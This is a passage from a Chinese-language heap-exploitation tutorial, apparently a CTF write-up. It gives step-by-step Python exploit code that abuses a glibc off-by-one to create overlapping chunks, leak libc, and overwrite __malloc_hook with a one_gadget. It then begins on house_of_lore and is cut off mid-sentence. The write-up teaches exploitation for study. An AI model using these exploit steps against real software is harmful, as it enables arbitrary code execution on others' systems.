然后在chunk_BBB上利用off by one修改chunk_CCC的prev_inuse位,由于chunk_BBB的大小属于fastbin,因此不会被和其他chunk合并

# leverage off-by-one vuln in chunk_BBB:
# overwrite prev_inuse bit of following chunk (chunk_CCC)
delete(1)
create(0x68, 'B'*0x68) # chunk_BBB, new idx = 0

下面修改prev size以及清除prev_inuse位,由于strcpy的限制,我们需要多次调用递减申请的size达到目的

# set prev_size of following chunk (chunk_CCC) to 0x170
for i in range(0x66, 0x5f, -1):
  delete(0)
  create(i+2, 'B'*i + '\x70\x01') # chunk_BBB, new_idx = 0

img

现在free chunk_CCC,它会被和前面的chunk合并,新的大小为0x170 bytes

# now delete chunk_CCC to trigger consolidation with the fakechunk (0x170)
# after this we have got a big free chunk (0x270) overlapping with chunk_BBB
delete(2)

img

然后申请一个大小与chunk_AAA相同的chunk

# create a new chunk (chunk_EEE) within the big free chunk to push
# the libc-addresses (fd/bk) down to chunk_BBB
create(0xf6, 'E'*0xf6) # chunk_EEE, new_idx = 1

img

打印chunk_BBB的内容即可泄露libc地址。通过vmmap查看libc的基址,可以得到libc_offset。

# the content of chunk_BBB now contains fd/bk (libc-addresses)
# just print the chunk (idx = 0)
libc_offset    = 0x3c4b78
libc_leak = printData(0)
libc_leak = unpack(libc_leak + (8-len(libc_leak))*'\x00', 64)
libc_base = libc_leak - libc_offset
log.info('libc_base: ' + hex(libc_base))

接下来就是最重要的环节了:控制RIP

这里我们通过将__malloc_hook指向gadget,这样在调用malloc时就会调用__malloc_hook,进而控制程序流。

那么如何修改__malloc_hook呢?我们已经有了两个重叠的chunk,这样便可以修改其中一个chunk的FD指针,将其指向__malloc_hook前面的区域。

首先恢复chunk_BBBsize+flags域,然后free掉chunk_BBBchunk_EEE

# restore the size field (0x70) of chunk_BBB
# delete(1)
# create(0xf9,'E'*0xf8+'\x70')
for i in range(0xfd, 0xf7, -1):
  delete(1)
  create(i+1, 'E'*i + '\x70') # chunk_EEE, new_idx = 1

# free chunk_BBB: the address of the chunk is added to the fastbin-list
delete(0)

# free chunk_EEE
delete(1)

chunk_BBB会被加入fastbin

Alt

然后可以通过申请一个大的堆块来修改chunk_BBB的FD指针

# create another new chunk (chunk_FFF) within the big free chunk which
# will set the fd of the free'd fastbin chunk_BBB to the value of foo
foo = 0xdeadbeef
create(0x108, 'F'*0x100 + p64(foo)) # new_idx = 0

此时FD指针已被修改为我们伪造的地址:

Alt

此时的fastbin如下:

Alt

由于malloc会检查fastbin是否合法,因为chunk_BBB的大小是0x70字节,那么接下来的chunk大小也需要是0x70字节。

__malloc_hook前面的区域恰好满足这个要求:

Alt

此时将接下来的chunk的FD修改为__malloc_hook的地址即可。这样在malloc时便会触发_malloc_hook,进而实现代码执行。

# create another new chunk (chunk_FFF) within the big free chunk which
# will set the fd of the free'd fastbin chunk_BBB to the address of hook
hook_offset = 0x3c4aed
hook        = libc_base + hook_offset
create(0x108, 'F'*0x100 + p64(hook)) # new_idx = 0

通过one_gadget查找gadget,这里和文章中的偏移不一样是因为glibc的小版本不一样:

image-20230424215608532

最终得到可用的gadget地址:0xf03a4

至此,已经完成了整个漏洞利用过程。

image-20230424220526787

house_of_lore

Tricking malloc into returning a nearly-arbitrary pointer by abusing the smallbin freelist.

通过伪造堆块实现返回指定位置的堆块,进而实现任意地址写。

我们需要修改三个堆块的内容,其中一个是真实的堆块(victim),另外两个是栈上伪造的。

通过伪造fake small bin list,将伪造的两个堆块加入small bin,然后